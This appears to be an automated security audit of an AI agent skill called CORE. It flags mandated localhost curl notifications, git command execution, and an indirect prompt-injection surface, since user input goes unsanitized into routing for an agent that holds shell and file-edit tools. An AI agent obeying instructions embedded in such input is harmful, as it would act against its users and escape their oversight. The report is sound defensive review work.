CORE
Warn
Audited by Gen Agent Trust Hub on Apr 7, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill requires the agent to execute shell commands as part of its internal lifecycle and safety protocols.
- Algorithm.md: Mandates the execution of 'curl' commands to 'http://localhost:8888/notify' at the entry point of the algorithm and at every subsequent phase transition (Observe, Think, Plan, etc.).
- SKILL.md: Instructs the agent to run 'git remote -v' before performing any git commits to verify the remote repository configuration.
- [DATA_EXFILTRATION]: The skill performs automated network operations that transmit internal state and task summaries.
- Algorithm.md: The mandated 'curl' calls send JSON payloads containing status messages and voice identifiers to a local network endpoint. While targeting localhost, these operations transmit data derived from the agent's internal workspace and task execution.
- [PROMPT_INJECTION]: The skill's architecture for categorizing and routing user requests presents a surface for indirect prompt injection.
- Ingestion points: User input is scanned for triggers defined in 'semantic-triggers.json' to activate specific skills or determine the required 'Effort Level' (SKILL.md).
- Boundary markers: The skill lack explicit instructions or delimiters to isolate user-provided data, potentially allowing embedded instructions to influence the agent's transition through 'The Algorithm' phases.
- Capability inventory: The agent is authorized to perform shell execution ('curl', 'git'), file system modifications ('Write' and 'Edit' tools in '~/.claude/'), and tool-based sub-agent invocation ('Skill' and 'Task' tools).
- Sanitization: There is no documented requirement for the agent to validate or sanitize user input before it is summarized or interpolated into notification messages and tool parameters.
Audit Metadata